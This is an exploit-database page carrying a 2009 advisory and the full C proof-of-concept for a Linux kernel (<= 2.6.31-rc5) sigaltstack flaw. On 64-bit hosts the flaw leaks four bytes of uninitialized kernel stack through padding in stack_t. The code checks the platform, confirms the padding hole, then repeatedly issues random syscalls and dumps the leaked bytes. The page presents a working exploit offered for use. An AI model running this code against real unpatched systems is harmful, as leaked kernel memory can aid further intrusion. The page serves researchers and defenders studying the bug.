Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit

2009.08.25
Credit: Jon Oberheide
Risk: Low
Local: Yes
Remote: No


CVSS Base Score: 4.9/10
Impact Subscore: 6.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: None

/* * sigaltstack-leak.c * * Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure * Jon Oberheide <jon@oberheide.org> * http://jon.oberheide.org * * Information: * * http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856 * * Ulrich Drepper correctly points out that there is generally padding in * the structure on 64-bit hosts, and that copying the structure from * kernel to user space can leak information from the kernel stack in those * padding bytes. * * Notes: * * Only 4 bytes of uninitialized kernel stack are leaked in the padding * between stack_t's ss_flags and ss_size. The disclosure only affects * affects 64-bit hosts. */ #include <stdio.h> #include <stddef.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <unistd.h> #include <time.h> #include <sys/syscall.h> #include <sys/types.h> const int randcalls[] = { 0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16, 21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73, 78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108, 109, 110, 11, 112, 113, 114, 116, 117, 118, 119, 120, 121, 121, 123, 124, 125, 140, 141, 143, 146 }; void dump(const unsigned char *p, unsigned l) { printf("stack_t:"); while (l > 0) { printf(" "); if (l == 12) { printf("*** "); } printf("%02x", *p); if (l == 9) { printf(" ***"); } ++p; --l; } printf("\n"); } int main(void) { char *p; int call, ret; size_t size, ftest, stest; stack_t oss; size = sizeof(stack_t); printf("[+] Checking platform...\n"); if (size == 24) { printf("[+] sizeof(stack_t) = %zu\n", size); printf("[+] Correct size, 64-bit platform.\n"); } else { printf("[-] sizeof(stack_t) = %zu\n", size); printf("[-] Error: you do not appear to be on a 64-bit platform.\n"); printf("[-] No information disclosure is possible.\n"); exit(1); } ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags); stest = offsetof(stack_t, ss_size); printf("[+] Checking for stack_t hole...\n"); if (ftest != stest) { printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest); printf("[+] Hole in stack_t present!\n", ftest, stest); } else { printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest); printf("[-] Error: No hole in stack_t, something is quite wrong.\n"); exit(1); } printf("[+] Ready to call sigaltstack.\n\n"); for (ret = 5; ret > 0; ret--) { printf("%d...\n", ret); sleep(1); } srand(time(NULL)); while (1) { /* random stuff to make stack pseudo-interesting */ call = rand() % (sizeof(randcalls) / sizeof(int)); syscall(randcalls[call]); ret = sigaltstack(NULL, &oss); if (ret != 0) { printf("[-] Error: sigaltstack failed.\n"); exit(1); } dump((unsigned char *) &oss, sizeof(oss)); } return 0; }

References:

https://bugzilla.redhat.com/show_bug.cgi?id=515392
http://www.openwall.com/lists/oss-security/2009/08/05/1
http://www.openwall.com/lists/oss-security/2009/08/04/1
http://www.milw0rm.com/exploits/9352
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=0083fc2c50e6c5127c2802ad323adf8143ab7856


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top